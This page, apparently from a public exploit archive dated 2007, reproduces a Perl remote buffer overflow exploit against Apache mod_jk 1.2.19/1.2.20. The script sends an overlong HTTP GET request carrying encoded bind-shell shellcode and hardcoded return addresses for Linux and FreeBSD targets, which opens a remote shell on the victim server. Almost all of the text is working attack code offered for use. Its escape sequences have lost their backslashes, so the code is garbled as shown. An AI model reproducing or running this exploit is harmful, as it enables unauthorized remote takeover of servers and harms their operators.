Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
# Published : 2007-06-22
# Author : eliteboy
# Previous Title : NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll v. 2.6.2.157) Exploit
# Next Title : ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit

# Apache w/ mod_jk Remote Exploit
# by eliteboy

use IO::Socket;

print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***n";

$target = $ARGV[1];
if (($#ARGV != 1) || ($target < 1) || ($target > 3)) {
	print "Usage: modjkx.pl <hostname> <targettype>n";
	print "1.tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20n"
		 ."tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19n";
	print "2.tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19n"
		 ."tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19n";
	print "3.tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19n";
	exit;
}

$port = 80;

### lnx metasploit bindshell code port 2007
my $lnx_shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x48x49x51x5ax6ax49".
"x58x50x30x42x31x42x41x6bx41x41x59x41x32x41x41x32".
"x42x41x30x42x41x58x50x38x41x42x75x69x79x37x41x6b".
"x6bx63x63x57x33x72x73x73x5ax76x62x32x4ax55x36x51".
"x48x4ex79x4ex69x38x61x6ax6dx4fx70x7ax36x77x33x30".
"x52x42x46x31x78x46x67x38x57x30x66x50x53x6dx59x4b".
"x51x32x4ax63x56x70x58x50x50x50x51x50x56x6fx79x4b".
"x51x7ax6dx4fx70x48x30x65x36x4bx61x4dx33x38x4dx4b".
"x30x72x72x50x52x56x36x42x63x6bx39x68x61x6ex50x33".
"x56x68x4dx6bx30x6dx43x70x6ax33x32x66x39x6cx70x37".
"x4fx58x4dx6fx70x42x69x31x69x39x69x6ex50x74x4bx46".
"x32x32x48x56x4fx46x4fx64x33x62x48x35x38x56x4fx42".
"x42x30x69x50x6ex6bx39x4ax43x56x32x73x63x4bx39x48".
"x61x68x4dx6dx50x49";

### bsd metasploit bindshell code port 5555
my $bsd_shellcode =
"xebx59x59x59x59xebx59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59x59".
"x59x59x59x59x59x59x59x59x59x59x59xe8xa4xffxffxff".
"x49x49x49x49x49x49x49x49x37x49x49x49x49x49x49x49".
"x49x49x51x5ax6ax42x58x50x30x42x30x42x6bx42x41x52".
"x42x41x32x42x41x32x41x41x30x41x41x58x38x42x42x50".
"x75x59x79x53x5ax31x71x33x68x4dx49x50x52x32x48x76".
"x70x43x32x55x45x6fx43x6cx49x68x61x36x32x51x52x36".
"x32x62x62x52x72x50x6ax66x70x5ax6dx4fx70x4fx69x6f".
"x63x50x51x32x73x73x62x50x6ax72x48x36x38x38x4dx4f".
"x70x4cx70x51x7ax68x4dx6fx70x62x72x62x73x50x52x58".
"x30x65x4ex5ax6dx4dx50x6cx57x32x4ax66x62x31x49x41".
"x7ax41x4ax52x78x46x31x30x57x32x71x4ax6dx4dx50x77".
"x39x51x69x6cx35x30x50x32x48x66x4fx56x4fx32x53x62".
"x48x52x48x76x4fx70x62x32x49x50x6ex4dx59x5ax43x52".
"x70x72x74x56x33x70x53x6ex50x47x4bx38x4dx6bx30x42".
"A" x 100;

$alignment = 4127;

$|=1;

if ($target eq 1) {
	$shellcode = $lnx_shellcode;
	$addr = 0xbffff060;
}

if ($target eq 2) {
	$shellcode = $lnx_shellcode;
	$addr = 0xbfffef4c;
}

if ($target eq 3) {
	$shellcode = $bsd_shellcode;
	$addr = 0xbfbfe5d5;
}

$offset = pack('l', $addr);

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => $port,
                              Proto    => 'tcp');

$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset;

print $sock "GET /$a HTTP/1.0rnrn";

while(<$sock>) {
	print;
}

# www.Syue.com [2007-06-22]